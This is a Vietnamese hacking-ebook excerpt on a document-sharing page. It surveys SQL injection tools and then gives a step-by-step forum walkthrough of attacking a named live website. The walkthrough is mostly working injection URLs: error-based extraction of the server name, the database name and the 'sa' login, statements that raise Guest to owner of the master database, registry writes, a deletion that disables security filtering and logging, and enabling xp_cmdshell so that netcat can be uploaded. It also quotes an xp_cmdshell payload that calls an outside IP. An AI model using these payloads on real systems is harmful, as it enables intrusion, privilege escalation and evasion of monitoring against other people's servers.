Hacker Professional Ebook part 241 ppsx

6 129 0
Hacker Professional Ebook part 241 ppsx

Đang tải... (xem toàn văn)

Thông tin tài liệu

vào danh sách từ điển cho riêng mình.Wpoison chạy trên Linux,có thể download tại: http://wpoison.sourceforge.net Ngoài ra còn có công cụ SPIKE Proxy,nó có các chức năng khá tốt-tự động thực hiện SQL Injection -những d0oạn string sẽ được Inject tuỳ vào thói quen người sử dụng .SPIKE Proxy là 1 Python và OpenSSL-công cụ đánh giá ứng dụng web cơ bản có các chức năng như HTTP và HTTPS Proxy Nó cho phép người phát triển web hoặc người quản trị ứng dụng web cấp thấp truy cập vào tòan bộ phương tiện ứng dụng web,trong khi nó cũng cung cấp 1 nhóm các công cụ tự động và những kĩ năng khám phá ra những lỗi thông thường,các công cụ đó bao gồm:SQL Injection,Website Crawler,Login Form Brute Forcer,Automated Overflow Detection v.vSpike Proxy chạy trên Win32 và Linux,các bạn có thể Download tại: www.immunitysec.com/spike.html Chú ý là phần mềm này nặng khoảng 13M và máy tính của bạn phải có sẵn Python và OpenSSL.Trong WinXP công cụ này không hoạt động. Mieliekoek.pl là 1 SQL Insertion Crawler,có chức năng kiểm tra các form liên quan đến lỗi SQL.Scrip này cung cấp 1 công cụ Web mirroring như là dữ liệu vào,xem xét từng file và nhân diện sự tồn tại các form trong file.Các chuỗi được Inject có thể dễ dàng thay đổi trong file cấu hình.Download Mieliekoek tại: http://packetstormsecurity.nl/UNIX/s /mieliekoek.pl Công cụ này chỉ hoạt động khi máy bạn đã cài PERL.Sau đây là 1 ví dụ của dữ liệu xuất từ mieliekoek: $badstring="blah'''; #$badstring="blah' or 1=1 "; $badstring="blah' exec master xp_cmdshell 'nslookup a.com 196.30.67.5' - '; Trên đây hình như là tất cả các bài viết về SQL Injection bằng tiếng Việt mà fantomas311 có , trong đó gồm các tác giả : Windak - Hoahongtim (Viethacker), Vicki , Chubehamhoc - Binhtrieu (VNISS) Ngoài ra còn vài người khác nữa ko nhớ là ai Trên đây cũng có một vài chỉnh sửa và bổ sung của Fantomas311 , tuy vậy chắc cũng còn sai sót đâu đó , anh em nào đọc thấy sai chỗ nào góp ý dùm ! Hi vọng đây có thể là một tài liệu hữu ích cho các bạn muốn tìm hiểu về SQL Injection Thân ! fantomas311(VNISS) Hack SQL Injection và nâng quyền với "sa" (bài 1) Bài viết được hoàn thành với sự trợ giúp của : Mr NEO TÌM KIẾM Uhm dạo này đói kém cc ,sau một hồi tìm kiếm shop mong kiếm được chút cháo trên google thì tình cờ tìm được site hxxp://www.darksidecreations.com/category.asp?catcode=10 Chà site sex bà coan ơi sex thì sex thêm đại dấu ' vô hxxp://www.darksidecreations.com/category.asp?catcode=10' KIỂM TRA dính rồi vui quá nhào dzô check tiếp nào hxxp://www.darksidecreations.com/category.asp?catcode=10 and 1=convert(int,@@servername) sp_password Vậy là được Server name là : BACKUP tiện thể làm luôn cái tên DB hxxp://www.darksidecreations.com/category.asp?catcode=10 and 1=convert(int,db_name()) sp_password Được Database Name là : darkside chậc đúng là dark ( site sex mà ) Kiểm tra cái thằng system user xem nào hxxp://www.darksidecreations.com/category.asp?catcode=10 and 1=convert(int,system_user) sp_password wow hay quá nè System_User 'sa' lúc này nghĩ ngay tới việc hack server đã thiệt Kiểm tra coi thằng ku SAdmin nó có Enable cái OpenRowSet cho mình không ha hxxp://www.darksidecreations.com/category.asp?catcode=10;select%20*%20from %20openro wset('sqloledb','';;,'') sp_password Microsoft OLE DB Provider for SQL Server error '80040e14' Ad hoc access to OLE DB provider 'sqloledb' has been denied. You must access this provider through a linked server. /category.asp, line 8 TrickyMaster(VNISS) Hack SQL Injection và nâng quyền với "sa" (bài 2) NÂNG & CHIẾM QUYỀN Giờ làm gì nhỉ ?? ah đưa mình (Guest) dzô DB OWNER của DB Master . Tại sao lại phải đưa Guest vào DataBase Owner cuar DataBase Master? Bở vì la` DB Owner của Db Master mới có quyền thực hiện lệnh xp_regwrite,xp_regdeletevalue và xp_cmdshell. Tại sao Guest lại sử dụng 2 lệnh xp_regwrite,xp_regdeletevalue và xp_cmdshell Bởi vì : xp_regwrite dùng để thực hiện lệnh ghi lên Registry của Windows xp_regdeletevalue dùng để xóa dữ liệu trong Registry của Windows xp_cmdshell dùng để gửi lệnh lên Windows dùng đề nâng quyền , chiếm quyền , cài backdoor Còn đây là lệnh để đưa Guest vào Db Owner của Db Master hxxp://www.darksidecreations.com/category.asp?catcode=10;exec sp_executesql N'create view dbo.test as select * from master.dbo.sysusers'exec sp_msdropretry 'xx update sysusers set sid=0x01 where name=''dbo''','xx' exec sp_msdropretry 'xx update dbo.test set sid=0x01,roles=0x01 where name=''Guest''','xx' exec sp_executesql N'drop view dbo.test' sp_password Nếu chạy links trên mà không báo lỗi và được trả về trang : hxxp://www.darksidecreations.com/category.asp?catcode=10 tức là bạn đã thực hiện thành công việc đưa Guest vào Db Owner của Db Master nhưng để cho chắc ăn mình vẫn kiểm tra lại một lần nữa bằng cách sau : hxxp://www.darksidecreations.com/category.asp?catcode=10%20%20and%201=c onvert(int,( select%20top%201%20name%20from%20master sysusers% 20where%20roles=0x01%20and%20name%20not%20in('dbo' ))) sp_password Vậy là xong giờ thì thoải mái chạy xp_regwrite với cả xp_cmdshell Có thể chạy xp_regwrite ,xp_regdeletevalue với xp_cmdshell rồi thì làm gì ??? Giờ login vào Database với user BUILTIN\ADMINISTRATOR với password = "" chạy thế này ; hxxp://www.darksidecreations.com/category.asp?catcode=10;exec%20sp_executes ql%20N'c reate%20view%20dbo.test%20as%20select%20*%20from%2 0master.dbo.sysxlogins'%20exec%20sp_msdropretry%20 'xx%20update%20sysusers%20set%20sid=0x01%20where%2 0name=''dbo''','xx'%20exec%20sp_msdropretry%20'xx% 20update%20dbo.test%20set%20xstatus=18%20where%20n ame=''BUILTIN\ADMINISTRATORS''','xx'%20exec%20sp_e xecutesql%20N'drop%20view%20dbo.test' sp_password Vậy là ta có một chú nằm vùng trong Db của nó he he sau này mọi mệnh lệnh đề phải thông qua chú này Nhưng giờ xài xp_regwrite trước ha Giờ mình dùng xp_regwrite để Enable cái OpenRowset đã bị thằng ku SysAdmin kia Disable ( tuy giờ đã Enable nhưng mình vẫn viết ra để các bạn biết ) hxxp://www.darksidecreations.com/category.asp?catcode=10;exec master xp_regwrite HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\MSSQLServer \Providers\SQLOLEDB','AllowInProcess',REG_DWORD,1 sp_password hxxp://www.darksidecreations.com/category.asp?catcode=10;exec master xp_regwrite HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\MSSQLServer \Providers\SQLOLEDB','DisallowAdhocAccess',REG_DWORD,0 sp_password Để ý mấy chỗ in đậm nhé: 1 : Enable 0 : Disable he he chạy mà nó trả về trang chủ là thành công khỏi check Giờ thì xài cái thằng xp_regdeletevalue để hủy chức năng ghi log và lọc dữ liệu của WINDOWS hxxp://www.darksidecreations.com/category.asp?catcode=10;exec master xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Ser vices\Tcpip\Parameters','EnableSecurityFilters' sp_password Giờ thì các bạn khỏi lo bị ghi log chính vì thế mình bỏ cái sp_password đi cũng được ^_^ nhưng bạn để lại cũng chẳng sao Giờ đến lúc bật cái xp_cmdshell lên à các bạn lưu ý nha ở trên là cho phép chạy xp_cmdshell còn ở đây là bật xp_cmdshell và allow updates kẻo lại chửi oan mình thì chết hxxp://www.darksidecreations.com/category.asp?catcode=10;select * from openrowset('sqloledb', 'server=BACKUP;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off select 1 exec master sp_addextendedproc xp_cmd,''xpsql70.dll'' exec sp_configure ''allow updates'', ''1'' reconfigure with override') sp_password TrickyMaster(VNISS) Hack SQL Injection và nâng quyền với "sa" (bài 3) Vậy là xong giờ thì dùng tới thằng xp_cmdshell để upload netcat Giờ các bạn chuẩn bị cho mình thế này: . Injection bằng tiếng Việt mà fantomas311 có , trong đó gồm các tác giả : Windak - Hoahongtim (Viethacker), Vicki , Chubehamhoc - Binhtrieu (VNISS) Ngoài ra còn vài người khác nữa ko nhớ là ai

Ngày đăng: 04/07/2014, 12:20

Từ khóa liên quan

Tài liệu cùng người dùng

  • Đang cập nhật ...

Tài liệu liên quan